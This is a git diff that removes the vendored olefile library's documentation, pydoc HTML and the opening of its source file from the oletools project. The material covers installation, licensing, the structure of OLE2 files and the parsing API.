-- List all the streams and storages contained in an OLE file
-- Open streams as files
-- Parse and read property streams, containing metadata of the file
-- Portable, pure Python module, no dependency
-
-olefile can be used as an independent module or with PIL/Pillow.
-
-olefile is mostly meant for developers. If you are looking for tools to analyze OLE files or to extract data
-(especially for security purposes such as malware analysis and forensics), then please also check my
-[python-oletools](http://www.decalage.info/python/oletools), which are built upon olefile and provide a higher-level
-interface.
-
-
-History
--------
-
-olefile is based on the OleFileIO module from [PIL](http://www.pythonware.com/products/pil/index.htm), the excellent
-Python Imaging Library, created and maintained by Fredrik Lundh. The olefile API is still compatible with PIL, but
-since 2005 I have improved the internal implementation significantly, with new features, bugfixes and a more robust
-design. From 2005 to 2014 the project was called OleFileIO_PL, and in 2014 I changed its name to olefile to celebrate
-its 9 years and its new write features.
-
-As far as I know, this module is the most complete and robust Python implementation to read MS OLE2 files, portable on
-several operating systems. (please tell me if you know other similar Python modules)
-
-Since 2014 olefile/OleFileIO_PL has been integrated into [Pillow](http://python-imaging.github.io/), the friendly fork
-of PIL. olefile will continue to be improved as a separate project, and new versions will be merged into Pillow regularly.
-
-Main improvements over the original version of OleFileIO in PIL:
-----------------------------------------------------------------
-
-- Compatible with Python 3.x and 2.6+
-- Many bug fixes
-- Support for files larger than 6.8MB
-- Support for 64 bits platforms and big-endian CPUs
-- Robust: many checks to detect malformed files
-- Runtime option to choose if malformed files should be parsed or raise exceptions
-- Improved API
-- Metadata extraction, stream/storage timestamps (e.g. for document forensics)
-- Can open file-like objects
-- Added setup.py and install.bat to ease installation
-- More convenient slash-based syntax for stream paths
-- Write features
-
-
---------------------------------------------------------------------------
-
-olefile documentation
----------------------
-
-- [[Home]]
-- [[License]]
-- [[Install]]
-- [[Contribute]], Suggest Improvements or Report Issues
-- [[OLE_Overview]]
-- [[API]] and Usage
diff --git a/oletools/thirdparty/olefile/doc/Install.html b/oletools/thirdparty/olefile/doc/Install.html
deleted file mode 100644
index 1560a942..00000000
--- a/oletools/thirdparty/olefile/doc/Install.html
+++ /dev/null
@@ -1,30 +0,0 @@
-
-
-
-
-
-
-
-
-
-How to Download and Install olefile
-Pre-requisites
-olefile requires Python 2.6, 2.7 or 3.x.
-For Python 2.5 and older, olefile falls back to an older version (based on OleFileIO_PL 0.26) which might not contain all the enhancements implemented in olefile.
-Download and Install
-To use olefile with other Python applications or your own scripts, the simplest solution is to run pip install olefile or easy_install olefile, to download and install the package in one go. Pip is part of the standard Python distribution since v2.7.9.
-To update olefile if a previous version is already installed, run pip install -U olefile.
-Otherwise you may download/extract the zip archive in a temporary directory and run python setup.py install.
-On Windows you may simply double-click on install.bat.
-
-olefile documentation
-
-- Home
-- License
-- Install
-- Contribute, Suggest Improvements or Report Issues
-- OLE_Overview
-- API and Usage
-
-
-
diff --git a/oletools/thirdparty/olefile/doc/Install.md b/oletools/thirdparty/olefile/doc/Install.md
deleted file mode 100644
index 6afa6245..00000000
--- a/oletools/thirdparty/olefile/doc/Install.md
+++ /dev/null
@@ -1,37 +0,0 @@
-How to Download and Install olefile
-===================================
-
-Pre-requisites
---------------
-
-olefile requires Python 2.6, 2.7 or 3.x.
-
-For Python 2.5 and older, olefile falls back to an older version (based on OleFileIO_PL 0.26) which might not contain
-all the enhancements implemented in olefile.
-
-
-Download and Install
---------------------
-
-To use olefile with other Python applications or your own scripts, the simplest solution is to run **pip install olefile**
-or **easy_install olefile**, to download and install the package in one go. Pip is part of the standard Python
-distribution since v2.7.9.
-
-To update olefile if a previous version is already installed, run **pip install -U olefile**.
-
-Otherwise you may download/extract the [zip archive](https://bitbucket.org/decalage/olefileio_pl/downloads) in a
-temporary directory and run **python setup.py install**.
-
-On Windows you may simply double-click on **install.bat**.
-
---------------------------------------------------------------------------
-
-olefile documentation
----------------------
-
-- [[Home]]
-- [[License]]
-- [[Install]]
-- [[Contribute]], Suggest Improvements or Report Issues
-- [[OLE_Overview]]
-- [[API]] and Usage
diff --git a/oletools/thirdparty/olefile/doc/License.html b/oletools/thirdparty/olefile/doc/License.html
deleted file mode 100644
index f83c512d..00000000
--- a/oletools/thirdparty/olefile/doc/License.html
+++ /dev/null
@@ -1,40 +0,0 @@
-
-
-
-
-
-
-
-
-
-License for olefile
-olefile (formerly OleFileIO_PL) is copyright (c) 2005-2015 Philippe Lagadec (http://www.decalage.info)
-All rights reserved.
-Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
-
-- Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
-- Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-olefile is based on source code from the OleFileIO module of the Python Imaging Library (PIL) published by Fredrik Lundh under the following license:
-The Python Imaging Library (PIL) is
-
-- Copyright (c) 1997-2005 by Secret Labs AB
-- Copyright (c) 1995-2005 by Fredrik Lundh
-
-By obtaining, using, and/or copying this software and/or its associated documentation, you agree that you have read, understood, and will comply with the following terms and conditions:
-Permission to use, copy, modify, and distribute this software and its associated documentation for any purpose and without fee is hereby granted, provided that the above copyright notice appears in all copies, and that both that copyright notice and this permission notice appear in supporting documentation, and that the name of Secret Labs AB or the author not be used in advertising or publicity pertaining to distribution of the software without specific, written prior permission.
-SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
-
-olefile documentation
-
-- Home
-- License
-- Install
-- Contribute, Suggest Improvements or Report Issues
-- OLE_Overview
-- API and Usage
-
-
-
diff --git a/oletools/thirdparty/olefile/doc/License.md b/oletools/thirdparty/olefile/doc/License.md
deleted file mode 100644
index 28bc4c13..00000000
--- a/oletools/thirdparty/olefile/doc/License.md
+++ /dev/null
@@ -1,54 +0,0 @@
-License for olefile
-===================
-
-olefile (formerly OleFileIO_PL) is copyright (c) 2005-2015 Philippe Lagadec ([http://www.decalage.info](http://www.decalage.info))
-
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without modification,
-are permitted provided that the following conditions are met:
-
- * Redistributions of source code must retain the above copyright notice, this
- list of conditions and the following disclaimer.
- * Redistributions in binary form must reproduce the above copyright notice,
- this list of conditions and the following disclaimer in the documentation
- and/or other materials provided with the distribution.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-
-----------
-
-olefile is based on source code from the OleFileIO module of the Python Imaging Library (PIL) published by Fredrik Lundh under the following license:
-
-The Python Imaging Library (PIL) is
-
-- Copyright (c) 1997-2005 by Secret Labs AB
-- Copyright (c) 1995-2005 by Fredrik Lundh
-
-By obtaining, using, and/or copying this software and/or its associated documentation, you agree that you have read, understood, and will comply with the following terms and conditions:
-
-Permission to use, copy, modify, and distribute this software and its associated documentation for any purpose and without fee is hereby granted, provided that the above copyright notice appears in all copies, and that both that copyright notice and this permission notice appear in supporting documentation, and that the name of Secret Labs AB or the author not be used in advertising or publicity pertaining to distribution of the software without specific, written prior permission.
-
-SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
-
---------------------------------------------------------------------------
-
-olefile documentation
----------------------
-
-- [[Home]]
-- [[License]]
-- [[Install]]
-- [[Contribute]], Suggest Improvements or Report Issues
-- [[OLE_Overview]]
-- [[API]] and Usage
diff --git a/oletools/thirdparty/olefile/doc/OLE_Overview.html b/oletools/thirdparty/olefile/doc/OLE_Overview.html
deleted file mode 100644
index ed481201..00000000
--- a/oletools/thirdparty/olefile/doc/OLE_Overview.html
+++ /dev/null
@@ -1,31 +0,0 @@
-
-
-
-
-
-
-
-
-
-About the structure of OLE files
-This page is part of the documentation for olefile. It provides a brief overview of the structure of Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office 97-2003 documents, Image Composer and FlashPix files, Outlook messages, StickyNotes, several Microscopy file formats, McAfee antivirus quarantine files, etc.
-An OLE file can be seen as a mini file system or a Zip archive: It contains streams of data that look like files embedded within the OLE file. Each stream has a name. For example, the main stream of a MS Word document containing its text is named "WordDocument".
-An OLE file can also contain storages. A storage is a folder that contains streams or other storages. For example, a MS Word document with VBA macros has a storage called "Macros".
-Special streams can contain properties. A property is a specific value that can be used to store information such as the metadata of a document (title, author, creation date, etc). Property stream names usually start with the character '\x05'.
-For example, a typical MS Word document may look like this:
-
-
-
-Go to the API page to see how to use all olefile features to parse OLE files.
-
-olefile documentation
-
-- Home
-- License
-- Install
-- Contribute, Suggest Improvements or Report Issues
-- OLE_Overview
-- API and Usage
-
-
-
diff --git a/oletools/thirdparty/olefile/doc/OLE_Overview.md b/oletools/thirdparty/olefile/doc/OLE_Overview.md
deleted file mode 100644
index db7fa668..00000000
--- a/oletools/thirdparty/olefile/doc/OLE_Overview.md
+++ /dev/null
@@ -1,29 +0,0 @@
-About the structure of OLE files
-================================
-
-This page is part of the documentation for [olefile](https://bitbucket.org/decalage/olefileio_pl/wiki). It provides a brief overview of the structure of [Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format)](http://en.wikipedia.org/wiki/Compound_File_Binary_Format), such as Microsoft Office 97-2003 documents, Image Composer and FlashPix files, Outlook messages, StickyNotes, several Microscopy file formats, McAfee antivirus quarantine files, etc.
-
-An OLE file can be seen as a mini file system or a Zip archive: It contains **streams** of data that look like files embedded within the OLE file. Each stream has a name. For example, the main stream of a MS Word document containing its text is named "WordDocument".
-
-An OLE file can also contain **storages**. A storage is a folder that contains streams or other storages. For example, a MS Word document with VBA macros has a storage called "Macros".
-
-Special streams can contain **properties**. A property is a specific value that can be used to store information such as the metadata of a document (title, author, creation date, etc). Property stream names usually start with the character '\x05'.
-
-For example, a typical MS Word document may look like this:
-
-![](OLE_VBA_sample.png)
-
-Go to the [[API]] page to see how to use all olefile features to parse OLE files.
-
-
---------------------------------------------------------------------------
-
-olefile documentation
----------------------
-
-- [[Home]]
-- [[License]]
-- [[Install]]
-- [[Contribute]], Suggest Improvements or Report Issues
-- [[OLE_Overview]]
-- [[API]] and Usage
diff --git a/oletools/thirdparty/olefile/doc/OLE_VBA_sample.png b/oletools/thirdparty/olefile/doc/OLE_VBA_sample.png
deleted file mode 100644
index 93f74d5e..00000000
Binary files a/oletools/thirdparty/olefile/doc/OLE_VBA_sample.png and /dev/null differ
diff --git a/oletools/thirdparty/olefile/olefile.html b/oletools/thirdparty/olefile/olefile.html
deleted file mode 100644
index b7d1981a..00000000
--- a/oletools/thirdparty/olefile/olefile.html
+++ /dev/null
@@ -1,432 +0,0 @@
-
-
-Python: module olefile
-
-
-
-
-
-
olefile (version 0.42, 2015-01-24) index
.\olefile.py
- # olefile (formerly OleFileIO_PL) version 0.42 2015-01-24
-#
-# Module to read/write Microsoft OLE2 files (also called Structured Storage or
-# Microsoft Compound Document File Format), such as Microsoft Office 97-2003
-# documents, Image Composer and FlashPix files, Outlook messages, ...
-# This version is compatible with Python 2.6+ and 3.x
-#
-# Project website: http://www.decalage.info/olefile
-#
-# olefile is copyright (c) 2005-2015 Philippe Lagadec (http://www.decalage.info)
-#
-# olefile is based on the OleFileIO module from the PIL library v1.1.6
-# See: http://www.pythonware.com/products/pil/index.htm
-#
-# The Python Imaging Library (PIL) is
-# Copyright (c) 1997-2005 by Secret Labs AB
-# Copyright (c) 1995-2005 by Fredrik Lundh
-#
-# See source code and LICENSE.txt for information on usage and redistribution.
-
-
-
-
-Modules
-
-
-array
-datetime
- io
-os
- struct
-sys
-
-
-
-
-Classes
-
-
-
-- OleFileIO
-
- OleMetadata
-
-
-
-
-
-class OleFileIO
-
-
-OLE container object
-
-This class encapsulates the interface to an OLE 2 structured
-storage file. Use the listdir and openstream methods to
-access the contents of this file.
-
-Object names are given as a list of strings, one for each subentry
-level. The root entry should be omitted. For example, the following
-code extracts all image streams from a Microsoft Image Composer file::
-
- ole = OleFileIO("fan.mic")
-
- for entry in ole.listdir():
- if entry[1:2] == "Image":
- fin = ole.openstream(entry)
- fout = open(entry[0:1], "wb")
- while True:
- s = fin.read(8192)
- if not s:
- break
- fout.write(s)
-
-You can use the viewer application provided with the Python Imaging
-Library to view the resulting files (which happens to be standard
-TIFF files).
-
-Methods defined here:
-- __init__(self, filename=None, raise_defects=40, write_mode=False, debug=False, path_encoding='utf-8')
- Constructor for the OleFileIO class.
-
-:param filename: file to open.
-
- - if filename is a string smaller than 1536 bytes, it is the path
- of the file to open. (bytes or unicode string)
- - if filename is a string longer than 1535 bytes, it is parsed
- as the content of an OLE file in memory. (bytes type only)
- - if filename is a file-like object (with read, seek and tell methods),
- it is parsed as-is.
-
-:param raise_defects: minimal level for defects to be raised as exceptions.
- (use DEFECT_FATAL for a typical application, DEFECT_INCORRECT for a
- security-oriented application, see source code for details)
-
-:param write_mode: bool, if True the file is opened in read/write mode instead
- of read-only by default.
-
-:param debug: bool, set debug mode
-
-:param path_encoding: None or str, name of the codec to use for path
- names (streams and storages), or None for Unicode.
- Unicode by default on Python 3+, UTF-8 on Python 2.x.
- (new in olefile 0.42, was hardcoded to Latin-1 until olefile v0.41)
-
-- close(self)
- close the OLE file, to release the file object
-
-- dumpdirectory(self)
- Dump directory (for debugging only)
-
-- dumpfat(self, fat, firstindex=0)
- Displays a part of FAT in human-readable form for debugging purpose
-
-- dumpsect(self, sector, firstindex=0)
- Displays a sector in a human-readable form, for debugging purpose.
-
-- exists(self, filename)
- Test if given filename exists as a stream or a storage in the OLE
-container.
-Note: filename is case-insensitive.
-
-:param filename: path of stream in storage tree. (see openstream for syntax)
-:returns: True if object exist, else False.
-
-- get_metadata(self)
- Parse standard properties streams, return an OleMetadata object
-containing all the available metadata.
-(also stored in the metadata attribute of the OleFileIO object)
-
-new in version 0.25
-
-- get_rootentry_name(self)
- Return root entry name. Should usually be 'Root Entry' or 'R' in most
-implementations.
-
-- get_size(self, filename)
- Return size of a stream in the OLE container, in bytes.
-
-:param filename: path of stream in storage tree (see openstream for syntax)
-:returns: size in bytes (long integer)
-:exception IOError: if file not found
-:exception TypeError: if this is not a stream.
-
-- get_type(self, filename)
- Test if given filename exists as a stream or a storage in the OLE
-container, and return its type.
-
-:param filename: path of stream in storage tree. (see openstream for syntax)
-:returns: False if object does not exist, its entry type (>0) otherwise:
-
- - STGTY_STREAM: a stream
- - STGTY_STORAGE: a storage
- - STGTY_ROOT: the root entry
-
-- getctime(self, filename)
- Return creation time of a stream/storage.
-
-:param filename: path of stream/storage in storage tree. (see openstream for
- syntax)
-:returns: None if creation time is null, a python datetime object
- otherwise (UTC timezone)
-
-new in version 0.26
-
-- getmtime(self, filename)
- Return modification time of a stream/storage.
-
-:param filename: path of stream/storage in storage tree. (see openstream for
- syntax)
-:returns: None if modification time is null, a python datetime object
- otherwise (UTC timezone)
-
-new in version 0.26
-
-- getproperties(self, filename, convert_time=False, no_conversion=None)
- Return properties described in substream.
-
-:param filename: path of stream in storage tree (see openstream for syntax)
-:param convert_time: bool, if True timestamps will be converted to Python datetime
-:param no_conversion: None or list of int, timestamps not to be converted
- (for example total editing time is not a real timestamp)
-
-:returns: a dictionary of values indexed by id (integer)
-
-- getsect(self, sect)
- Read given sector from file on disk.
-
-:param sect: int, sector index
-:returns: a string containing the sector data.
-
-- listdir(self, streams=True, storages=False)
- Return a list of streams and/or storages stored in this file
-
-:param streams: bool, include streams if True (True by default) - new in v0.26
-:param storages: bool, include storages if True (False by default) - new in v0.26
- (note: the root storage is never included)
-:returns: list of stream and/or storage paths
-
-- loaddirectory(self, sect)
- Load the directory.
-
-:param sect: sector index of directory stream.
-
-- loadfat(self, header)
- Load the FAT table.
-
-- loadfat_sect(self, sect)
- Adds the indexes of the given sector to the FAT
-
-:param sect: string containing the first FAT sector, or array of long integers
-:returns: index of last FAT sector.
-
-- loadminifat(self)
- Load the MiniFAT table.
-
-- open(self, filename, write_mode=False)
- Open an OLE2 file in read-only or read/write mode.
-Read and parse the header, FAT and directory.
-
-:param filename: string-like or file-like object, OLE file to parse
-
- - if filename is a string smaller than 1536 bytes, it is the path
- of the file to open. (bytes or unicode string)
- - if filename is a string longer than 1535 bytes, it is parsed
- as the content of an OLE file in memory. (bytes type only)
- - if filename is a file-like object (with read, seek and tell methods),
- it is parsed as-is.
-
-:param write_mode: bool, if True the file is opened in read/write mode instead
- of read-only by default. (ignored if filename is not a path)
-
-- openstream(self, filename)
- Open a stream as a read-only file object (BytesIO).
-Note: filename is case-insensitive.
-
-:param filename: path of stream in storage tree (except root entry), either:
-
- - a string using Unix path syntax, for example:
- 'storage_1/storage_1.2/stream'
- - or a list of storage filenames, path to the desired stream/storage.
- Example: ['storage_1', 'storage_1.2', 'stream']
-
-:returns: file object (read-only)
-:exception IOError: if filename not found, or if this is not a stream.
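The two accepted path forms (Unix-style string or list of storage names) map onto each other directly. A minimal sketch of that mapping, using hypothetical helper names (`path_str2list`/`path_list2str` appear only in the module's TODO list, not in the public API):

```python
def path_str2list(path):
    # split a Unix-style stream path into storage components,
    # dropping empty segments from leading/trailing slashes
    return [part for part in path.split('/') if part]

def path_list2str(parts):
    # inverse: join storage components back into a Unix-style path
    return '/'.join(parts)

print(path_str2list('storage_1/storage_1.2/stream'))
# ['storage_1', 'storage_1.2', 'stream'] - both forms name the same stream
```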
-
-- sect2array(self, sect)
- convert a sector to an array of 32 bits unsigned integers,
-swapping bytes on big endian CPUs such as PowerPC (old Macs)
-
-- write_sect(self, sect, data, padding='\x00')
- Write given sector to file on disk.
-
-:param sect: int, sector index
-:param data: bytes, sector data
-:param padding: single byte, padding character if data < sector size
-
-- write_stream(self, stream_name, data)
- Write a stream to disk. For now, it is only possible to replace an
-existing stream by data of the same size.
-
-:param stream_name: path of stream in storage tree (except root entry), either:
-
- - a string using Unix path syntax, for example:
- 'storage_1/storage_1.2/stream'
- - or a list of storage filenames, path to the desired stream/storage.
- Example: ['storage_1', 'storage_1.2', 'stream']
-
-:param data: bytes, data to be written, must be the same size as the original
- stream.
-
-
-
-
-
-class OleMetadata
-
-
-class to parse and store metadata from standard properties of OLE files.
-
-Available attributes:
-codepage, title, subject, author, keywords, comments, template,
-last_saved_by, revision_number, total_edit_time, last_printed, create_time,
-last_saved_time, num_pages, num_words, num_chars, thumbnail,
-creating_application, security, codepage_doc, category, presentation_target,
-bytes, lines, paragraphs, slides, notes, hidden_slides, mm_clips,
-scale_crop, heading_pairs, titles_of_parts, manager, company, links_dirty,
-chars_with_spaces, unused, shared_doc, link_base, hlinks, hlinks_changed,
-version, dig_sig, content_type, content_status, language, doc_version
-
-Note: an attribute is set to None when not present in the properties of the
-OLE file.
-
-References for SummaryInformation stream:
-- http://msdn.microsoft.com/en-us/library/dd942545.aspx
-- http://msdn.microsoft.com/en-us/library/dd925819%28v=office.12%29.aspx
-- http://msdn.microsoft.com/en-us/library/windows/desktop/aa380376%28v=vs.85%29.aspx
-- http://msdn.microsoft.com/en-us/library/aa372045.aspx
-- http://sedna-soft.de/summary-information-stream/
-- http://poi.apache.org/apidocs/org/apache/poi/hpsf/SummaryInformation.html
-
-References for DocumentSummaryInformation stream:
-- http://msdn.microsoft.com/en-us/library/dd945671%28v=office.12%29.aspx
-- http://msdn.microsoft.com/en-us/library/windows/desktop/aa380374%28v=vs.85%29.aspx
-- http://poi.apache.org/apidocs/org/apache/poi/hpsf/DocumentSummaryInformation.html
-
-new in version 0.25
-
-Methods defined here:
-- __init__(self)
- Constructor for OleMetadata
-All attributes are set to None by default
-
-- dump(self)
- Dump all metadata, for debugging purposes.
-
-- parse_properties(self, olefile)
- Parse standard properties of an OLE file, from the streams
-"SummaryInformation" and "DocumentSummaryInformation",
-if present.
-Properties are converted to strings, integers or python datetime objects.
-If a property is not present, its value is set to None.
-
-
-Data and other attributes defined here:
-- DOCSUM_ATTRIBS = ['codepage_doc', 'category', 'presentation_target', 'bytes', 'lines', 'paragraphs', 'slides', 'notes', 'hidden_slides', 'mm_clips', 'scale_crop', 'heading_pairs', 'titles_of_parts', 'manager', 'company', 'links_dirty', 'chars_with_spaces', 'unused', 'shared_doc', 'link_base', ...]
-
-- SUMMARY_ATTRIBS = ['codepage', 'title', 'subject', 'author', 'keywords', 'comments', 'template', 'last_saved_by', 'revision_number', 'total_edit_time', 'last_printed', 'create_time', 'last_saved_time', 'num_pages', 'num_words', 'num_chars', 'thumbnail', 'creating_application', 'security']
-
-
-
-
-
-Functions
-
-
-- debug = debug_pass(msg)
- - debug_pass(msg)
- - debug_print(msg)
- - filetime2datetime(filetime)
- convert FILETIME (64 bits int) to Python datetime.datetime
- - i16(c, o=0)
- Converts a 2-bytes (16 bits) string to an integer.
-
-:param c: string containing bytes to convert
-:param o: offset of bytes to convert in string
- - i32(c, o=0)
- Converts a 4-bytes (32 bits) string to an integer.
-
-:param c: string containing bytes to convert
-:param o: offset of bytes to convert in string
- - i8(c)
- # version for Python 2.x
- - isOleFile(filename)
- Test if a file is an OLE container (according to the magic bytes in its header).
-
-:param filename: string-like or file-like object, OLE file to parse
-
- - if filename is a string smaller than 1536 bytes, it is the path
- of the file to open. (bytes or unicode string)
- - if filename is a string longer than 1535 bytes, it is parsed
- as the content of an OLE file in memory. (bytes type only)
- - if filename is a file-like object (with read and seek methods),
- it is parsed as-is.
-
-:returns: True if OLE, False otherwise.
- - set_debug_mode(debug_mode)
- Set debug mode on or off, to control display of debugging messages.
-:param mode: True or False
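The `i16`/`i32` helpers documented above are thin wrappers around `struct.unpack` with little-endian unsigned formats. A minimal re-implementation for illustration:

```python
import struct

def i16(c, o=0):
    # 2 bytes at offset o, little-endian, unsigned ("<H")
    return struct.unpack('<H', c[o:o+2])[0]

def i32(c, o=0):
    # 4 bytes at offset o, little-endian, unsigned ("<I")
    return struct.unpack('<I', c[o:o+4])[0]

print(hex(i16(b'\x34\x12')))          # 0x1234
print(hex(i32(b'\x78\x56\x34\x12')))  # 0x12345678
```

Little-endian decoding matters here because all multi-byte fields in the OLE header and FAT are stored least-significant byte first.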
-
-
-
-
-Data
-
-
-DEBUG_MODE = False
-DEFAULT_PATH_ENCODING = 'utf-8'
-DEFECT_FATAL = 40
-DEFECT_INCORRECT = 30
-DEFECT_POTENTIAL = 20
-DEFECT_UNSURE = 10
-DIFSECT = 4294967292L
-ENDOFCHAIN = 4294967294L
-FATSECT = 4294967293L
-FREESECT = 4294967295L
-KEEP_UNICODE_NAMES = True
-MAGIC = '\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1'
-MAXREGSECT = 4294967290L
-MAXREGSID = 4294967290L
-MINIMAL_OLEFILE_SIZE = 1536
-NOSTREAM = 4294967295L
-STGTY_EMPTY = 0
-STGTY_LOCKBYTES = 3
-STGTY_PROPERTY = 4
-STGTY_ROOT = 5
-STGTY_STORAGE = 1
-STGTY_STREAM = 2
-UINT32 = 'L'
-VT = {0: 'VT_EMPTY', 1: 'VT_NULL', 2: 'VT_I2', 3: 'VT_I4', 4: 'VT_R4', 5: 'VT_R8', 6: 'VT_CY', 7: 'VT_DATE', 8: 'VT_BSTR', 9: 'VT_DISPATCH', ...}
-VT_BLOB = 65
-VT_BLOB_OBJECT = 70
-VT_BOOL = 11
-VT_BSTR = 8
-VT_CARRAY = 28
-VT_CF = 71
-VT_CLSID = 72
-VT_CY = 6
-VT_DATE = 7
-VT_DECIMAL = 14
-VT_DISPATCH = 9
-VT_EMPTY = 0
-VT_ERROR = 10
-VT_FILETIME = 64
-VT_HRESULT = 25
-VT_I1 = 16
-VT_I2 = 2
-VT_I4 = 3
-VT_I8 = 20
-VT_INT = 22
-VT_LPSTR = 30
-VT_LPWSTR = 31
-VT_NULL = 1
-VT_PTR = 26
-VT_R4 = 4
-VT_R8 = 5
-VT_SAFEARRAY = 27
-VT_STORAGE = 67
-VT_STORED_OBJECT = 69
-VT_STREAM = 66
-VT_STREAMED_OBJECT = 68
-VT_UI1 = 17
-VT_UI2 = 18
-VT_UI4 = 19
-VT_UI8 = 21
-VT_UINT = 23
-VT_UNKNOWN = 13
-VT_USERDEFINED = 29
-VT_VARIANT = 12
-VT_VECTOR = 4096
-VT_VOID = 24
-WORD_CLSID = '00020900-0000-0000-C000-000000000046'
-__author__ = 'Philippe Lagadec'
-__date__ = '2015-01-24'
-__version__ = '0.42'
-keyword = 'VT_UNKNOWN'
-print_function = _Feature((2, 6, 0, 'alpha', 2), (3, 0, 0, 'alpha', 0), 65536)
-var = 13
-
-
-
-Author
-
-
-Philippe Lagadec
-
\ No newline at end of file
diff --git a/oletools/thirdparty/olefile/olefile.py b/oletools/thirdparty/olefile/olefile.py
deleted file mode 100644
index 1c4b50a3..00000000
--- a/oletools/thirdparty/olefile/olefile.py
+++ /dev/null
@@ -1,2476 +0,0 @@
-"""
-olefile (formerly OleFileIO_PL)
-
-Module to read/write Microsoft OLE2 files (also called Structured Storage or
-Microsoft Compound Document File Format), such as Microsoft Office 97-2003
-documents, Image Composer and FlashPix files, Outlook messages, ...
-This version is compatible with Python 2.6+ and 3.x
-
-Project website: https://www.decalage.info/olefile
-
-olefile is copyright (c) 2005-2017 Philippe Lagadec
-(https://www.decalage.info)
-
-olefile is based on the OleFileIO module from the PIL library v1.1.7
-See: http://www.pythonware.com/products/pil/index.htm
-and http://svn.effbot.org/public/tags/pil-1.1.7/PIL/OleFileIO.py
-
-The Python Imaging Library (PIL) is
-Copyright (c) 1997-2009 by Secret Labs AB
-Copyright (c) 1995-2009 by Fredrik Lundh
-
-See source code and LICENSE.txt for information on usage and redistribution.
-"""
-
-# Since OleFileIO_PL v0.30, only Python 2.6+ and 3.x is supported
-# This import enables print() as a function rather than a keyword
-# (main requirement to be compatible with Python 3.x)
-# The comment on the line below should be printed on Python 2.5 or older:
-from __future__ import print_function # This version of olefile requires Python 2.6+ or 3.x.
-
-
-#--- LICENSE ------------------------------------------------------------------
-
-# olefile (formerly OleFileIO_PL) is copyright (c) 2005-2017 Philippe Lagadec
-# (https://www.decalage.info)
-#
-# All rights reserved.
-#
-# Redistribution and use in source and binary forms, with or without modification,
-# are permitted provided that the following conditions are met:
-#
-# * Redistributions of source code must retain the above copyright notice, this
-# list of conditions and the following disclaimer.
-# * Redistributions in binary form must reproduce the above copyright notice,
-# this list of conditions and the following disclaimer in the documentation
-# and/or other materials provided with the distribution.
-#
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
